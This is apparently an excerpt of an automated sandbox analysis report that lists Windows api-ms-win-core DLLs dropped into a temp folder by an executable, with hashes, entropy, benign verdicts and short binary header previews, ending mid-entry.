                                                                                                                                                                                                                            SHA-512:2CA8AD8E58C01F589E32FFAF43477F09A14CED00C5F5330FDF017E91B0083414F1D2FE251EE7E8DD73BC9629A72A6E2205EDBFC58F314F97343708C35C4CF6C4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....r.r.........." .........................................................0.......T....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12176
                                                                                                                                                                                                                            Entropy (8bit):6.728898668835788
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:W4mxD3JbDWfhWoqEWULwu0Sc2HnhWgN7a8W1FFUOk9qnajMDkU0:W4AbDWfhWojD/HRN7aghlQDkz
                                                                                                                                                                                                                            MD5:AB810B5ED6A091A174196D39AF3EB40C
                                                                                                                                                                                                                            SHA1:31F175B456AB5A56A0272E984D04F3062CF05D25
                                                                                                                                                                                                                            SHA-256:4BA34EE15D266F65420F9D91BAC19DB401C9EDF97A2F9BDE69E4CE17C201AB67
                                                                                                                                                                                                                            SHA-512:6669764529EEEFD224D53FEAC584FD9E2C0473A0D3A6F8990B2BE49AAEEE04C44A23B3CA6BA12E65A8D7F4AEB7292A551BEE7EA20E5C1C6EFA5EA5607384CCAB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Mz............" .........................................................0......#.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15760
                                                                                                                                                                                                                            Entropy (8bit):6.617142193321366
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:W/IAuVYPvVX8rFTs0WfhWoOWULwu0Sc2HnhWgN7a8WW52bTfvXqnajan5J7N0y:WFBPvVXuWfhWogD/HRN7D0XlOnP
                                                                                                                                                                                                                            MD5:869C7061D625FEC5859DCEA23C812A0A
                                                                                                                                                                                                                            SHA1:670A17EBDE8E819331BD8274A91021C5C76A04BA
                                                                                                                                                                                                                            SHA-256:2087318C9EDBAE60D27B54DD5A5756FE5B1851332FB4DCD9EFDC360DFEB08D12
                                                                                                                                                                                                                            SHA-512:EDFF28467275D48B6E9BAEEC98679F91F7920CC1DE376009447A812F69B19093F2FD8CA03CCCBDC41B7F5AE7509C2CD89E34F33BC0DF542D74E025E773951716
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d..._............." .........................................................@............`.........................................`................0...................#..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12168
                                                                                                                                                                                                                            Entropy (8bit):6.688511108737727
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WOMWfhW8WULwu0Sc2HnhWgN7asWatDwmcVTW1KqnajKswlZzX:W5WfhWaD/HRN7FwmEy4lGswldX
                                                                                                                                                                                                                            MD5:1F72BA20E6771FE77DD27A3007801D37
                                                                                                                                                                                                                            SHA1:DB0EB1B03F742CA62EEEBCA6B839FDB51F98A14F
                                                                                                                                                                                                                            SHA-256:0AE3EE32F44AAED5389CC36D337D57D0203224FC6808C8A331A12EC4955BB2F4
                                                                                                                                                                                                                            SHA-512:13E802AEF851B59E609BF1DBD3738273EF6021C663C33B61E353B489E7BA2E3D3E61838E6C316FBF8A325FCE5D580223CF6A9E61E36CDCA90F138CFD7200BB27
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...m............." .........................................................0.......,....`.........................................`...L............ ...................#..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12152
                                                                                                                                                                                                                            Entropy (8bit):6.795365219000848
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WxVzWfhWFWULwu0Sc2HnhWgN7aMW/tImZdGP2qnajxfgX:WxVzWfhWvD/HRN7c3LlFfu
                                                                                                                                                                                                                            MD5:C3408E38A69DC84D104CE34ABF2DFE5B
                                                                                                                                                                                                                            SHA1:8C01BD146CFD7895769E3862822EDB838219EDAB
                                                                                                                                                                                                                            SHA-256:0BF0F70BD2B599ED0D6C137CE48CF4C419D15EE171F5FAEAC164E3B853818453
                                                                                                                                                                                                                            SHA-512:AA47871BC6EBF02DE3FE1E1A4001870525875B4F9D4571561933BA90756C17107DDF4D00FA70A42E0AE9054C8A2A76D11F44B683D92FFD773CAB6CDC388E9B99
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....'............" .........................................................0............`.........................................`................ ..................x#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12176
                                                                                                                                                                                                                            Entropy (8bit):6.693611789221205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WrWfhWZWULwu0Sc2HnhWgN7aMWubjafvXqnajan5tu2:WrWfhWzD/HRN7XYXlOna2
                                                                                                                                                                                                                            MD5:F4E6ECD99FE8B3ABD7C5B3E3868D8EA2
                                                                                                                                                                                                                            SHA1:609EE75D61966C6E8C2830065FBA09EBEBD1EEF3
                                                                                                                                                                                                                            SHA-256:FBE41A27837B8BE026526AD2A6A47A897DD1C9F9EBA639D700F7F563656BD52B
                                                                                                                                                                                                                            SHA-512:F0C265A9DF9E623F6AF47587719DA169208619B4CBF01F081F938746CBA6B1FD0AB6C41EE9D3A05FA9F67D11F60D7A65D3DD4D5AD3DD3A38BA869C2782B15202
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......L....`.........................................`...`............ ...................#..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12688
                                                                                                                                                                                                                            Entropy (8bit):6.6505620878411085
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WZZlKWfhWomWULwu0Sc2HnhWgN7a8WyLhWOk9qnajMDks:WLlKWfhWo4D/HRN7LEhlQDks
                                                                                                                                                                                                                            MD5:A0C0C0FF40C9ED12B1ECACADCB57569A
                                                                                                                                                                                                                            SHA1:87ED14454C1CF8272C38199D48DFA81E267BC12F
                                                                                                                                                                                                                            SHA-256:C0F771A24E7F6EDA6E65D079F7E99C57B026955657A00962BCD5FF1D43B14DD0
                                                                                                                                                                                                                            SHA-512:122E0345177FD4AC2FE4DD6D46016815694B06C55D27D5A3B8A5CABD5235E1D5FC67E801618C26B5F4C0657037020DAC84A43FCEDBC5BA22F3D95B231AA4E7B3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....Bb.........." .........................................................0......'z....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12176
                                                                                                                                                                                                                            Entropy (8bit):6.716058514516582
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:W9WfhWo0WULwu0Sc2HnhWgN7a8WBinOk9qnajMDkFE:W9WfhWoSD/HRN7e2hlQDkFE
                                                                                                                                                                                                                            MD5:41D96E924DEA712571321AD0A8549922
                                                                                                                                                                                                                            SHA1:29214A2408D0222DAE840E5CDBA25F5BA446C118
                                                                                                                                                                                                                            SHA-256:47ABFB801BCBD349331532BA9D3E4C08489F27661DE1CB08CCAF5ACA0FC80726
                                                                                                                                                                                                                            SHA-512:CD0DE3596CB40A256FA1893621E4A28CC83C0216C9C442E0802DD0B271EE9B61C810F9FD526BD7AB1DF5119E62E2236941E3A7B984927FBA305777D35C30BA5A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......N.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13192
                                                                                                                                                                                                                            Entropy (8bit):6.656708616069495
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WkvuBL3BBLJWfhWiWULwu0Sc2HnhWgN7asWhpfH2vArqnajKsrw:WkvuBL3BrWfhWUD/HRN7QH24rlGsrw
                                                                                                                                                                                                                            MD5:AA47023CEED41432662038FD2CC93A71
                                                                                                                                                                                                                            SHA1:7728FB91D970ED4A43BEA77684445EE50D08CC89
                                                                                                                                                                                                                            SHA-256:39635C850DB76508DB160A208738D30A55C4D6EE3DE239CC2DDC7E18264A54A4
                                                                                                                                                                                                                            SHA-512:C9D1EF744F5C3955011A5FEA216F9C4ECA53C56BF5D9940C266E621F3E101DC61E93C4B153A9276EF8B18E7B2CADB111EA7F06E7CE691A4EAEF9258D463E86BE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):14728
                                                                                                                                                                                                                            Entropy (8bit):6.718242382400788
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:WpOMw3zdp3bwjGjue9/0jCRrndbWsWfhWOD/HRN7DlEnEQmDWlGs76Qq:8OMwBprwjGjue9/0jCRrndbG/DvhEE1t
                                                                                                                                                                                                                            MD5:75EF38B27BE5FA07DC07CA44792EDCC3
                                                                                                                                                                                                                            SHA1:7392603B8C75A57857E5B5773F2079CB9DA90EE9
                                                                                                                                                                                                                            SHA-256:659F3321F272166F0B079775DF0ABDAF1BC482D1BCC66F42CAE08FDE446EB81A
                                                                                                                                                                                                                            SHA-512:78B485583269B3721A89D4630D746A1D9D0488E73F58081C7BDC21948ABF830263E6C77D9F31A8AD84ECB5FF02B0922CB39F3824CCD0E0ED026A5E343A8427BC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....V............" .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12688
                                                                                                                                                                                                                            Entropy (8bit):6.693787977570938
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WyqWfhWowWULwu0Sc2HnhWgN7a8Wi6msOk9qnajMDk7:WyqWfhWoOD/HRN78BhlQDk7
                                                                                                                                                                                                                            MD5:960C4DEF6BDD1764AEB312F4E5BFDDE0
                                                                                                                                                                                                                            SHA1:3F5460BD2B82FBEEDDD1261B7AE6FA1C3907B83A
                                                                                                                                                                                                                            SHA-256:FAB3891780C7F7BAC530B4B668FCE31A205FA556EAAB3C6516249E84BBA7C3DC
                                                                                                                                                                                                                            SHA-512:2C020A2FFBA7AD65D3399DCC0032872D876A3DA9B2C51E7281D2445881A0F3D95DE22B6706C95E6A81BA5B47E191877B7063D0AC24D09CAB41354BABDA64D2AF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....2..........." .........................................................0.......%....`.........................................`...l............ ...................#..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12176
                                                                                                                                                                                                                            Entropy (8bit):6.794778399632109
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WqWfhWo+WULwu0Sc2HnhWgN7a8WYRK+sOk9qnajMDkBSF:WqWfhWoQD/HRN7oBhlQDkBSF
                                                                                                                                                                                                                            MD5:D6297CFE7187850DB6439E13003203C6
                                                                                                                                                                                                                            SHA1:9455184AD49E5C277B06D1AF97600B6B5FA1F638
                                                                                                                                                                                                                            SHA-256:C8C2E69FB9B3F0956C442C8FBAFD2DA64B9A32814338104C361E8B66D06D36A2
                                                                                                                                                                                                                            SHA-512:1954299FDBC76C24CA127417A3F7E826ABA9B4C489FA5640DF93CB9AFF53BE0389E0575B2DE6ADC16591E82FBC0C51C617FAF8CC61D3940D21C439515D1033B5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....5..........." .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13200
                                                                                                                                                                                                                            Entropy (8bit):6.668461025084757
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:W8WWfhWo9WULwu0Sc2HnhWgN7a8WC/OFOk9qnajMDkmUa:W8WWfhWoHD/HRN7PshlQDkmp
                                                                                                                                                                                                                            MD5:E1239FA9B8909DCCDE2C246E8097AEBF
                                                                                                                                                                                                                            SHA1:3D6510E0D80ED5DF227CAC7B0E9D703898303BD6
                                                                                                                                                                                                                            SHA-256:B74FC81AEED00ECE41CD995B24AE18A32F4E224037165F0124685288C8FAE0BD
                                                                                                                                                                                                                            SHA-512:75C629D08D11ECDDC97B20EF8A693A545D58A0F550320D15D014B7BCEC3E59E981C990A0D10654F4E6398033415881E175DFA37025C1FB20EE7B8D100E04CFD7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....h..........." .........................................................0............`.........................................`...H............ ...................#..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):14224
                                                                                                                                                                                                                            Entropy (8bit):6.726978001238247
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:WOWXk1JzNcKSIHWfhWoxD/HRN7rMphlQDk1z+:FbcKStxxDvre916
                                                                                                                                                                                                                            MD5:73C94E37721CE6D642EC6870F92035D8
                                                                                                                                                                                                                            SHA1:BE06EFF7CA92231F5F1112DD90B529DF39C48966
                                                                                                                                                                                                                            SHA-256:5456B4C4E0045276E2AD5AF8F3F29CD978C4287C2528B491935DD879E13FDAF9
                                                                                                                                                                                                                            SHA-512:82F39075AD989D843285BB5D885129B7D9489B2B0102E5B6824DCEE4929C0218CFC4C4BC336BE7C210498D4409843FAAA63F0CD7B4B6F3611EB939436C365E3A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....,-a.........." .........................................................0.......h....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12688
                                                                                                                                                                                                                            Entropy (8bit):6.717379913510996
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:Wet2DfIe9jWfhWo3OWULwu0Sc2HnhWgN7a8WZkYfvXqnajan5CHB:Wet2DfIe9jWfhWo3gD/HRN7AXlOnG
                                                                                                                                                                                                                            MD5:A55ABF3646704420E48C8E29CCDE5F7C
                                                                                                                                                                                                                            SHA1:C2AC5452ADBC8D565AD2BC9EC0724A08B449C2D8
                                                                                                                                                                                                                            SHA-256:C2F296DD8372681C37541B0CA8161B4621037D5318B7B8C5346CF7B8A6E22C3E
                                                                                                                                                                                                                            SHA-512:C8EB3EC20821AE4403D48BB5DBF2237428016F23744F7982993A844C53AE89D06F86E03AB801E5AEE441A83A82A7C591C0DE6A7D586EA1F8C20A2426FCED86F0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......P.....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):11664
                                                                                                                                                                                                                            Entropy (8bit):6.830571011340059
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WUaVWfhWo+9WULwu0Sc2HnhWgN7a8WeL/ismsqnaj5fQ1TIK+:WUIWfhWo+HD/HRN7tLqs9l1G8K+
                                                                                                                                                                                                                            MD5:053E6DAA285F2E36413E5B33C6307C0C
                                                                                                                                                                                                                            SHA1:E0EC3B433B7DFE1B30F5E28500D244E455AB582B
                                                                                                                                                                                                                            SHA-256:39942416FDC139D309E45A73835317675F5B9AB00A05AC7E3007BB846292E8C8
                                                                                                                                                                                                                            SHA-512:04077DE344584DD42BA8C250AA0D5D1DC5C34116BB57B7D236B6048BD8B35C60771051744482D4F23196DE75638CAF436AEE5D3B781927911809E4F33B02031F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0............`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12688
                                                                                                                                                                                                                            Entropy (8bit):6.6657444922829105
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:WIGeVxWfhWoAWULwu0Sc2HnhWgN7a8WapOk9qnajMDkQID:WIGeVxWfhWoeD/HRN7hhlQDkQe
                                                                                                                                                                                                                            MD5:462E7163064C970737E83521AE489A42
                                                                                                                                                                                                                            SHA1:969727049EF84F1B45DE23C696B592EA8B1F8774
                                                                                                                                                                                                                            SHA-256:FE7081C825CD49C91D81B466F2607A8BB21F376B4FDB76E1D21251565182D824
                                                                                                                                                                                                                            SHA-512:0951A224CE3FF448296CC3FC99A0C98B7E2A04602DF88D782EA7038DA3C553444A549385D707B239F192DBEF23E659B814B302DF4D6A5503F64AF3B9F64107DB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0......4{....`.........................................`................ ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12176
                                                                                                                                                                                                                            Entropy (8bit):6.74899803008622
                                                                                                                                                                                                                            Encrypted:false
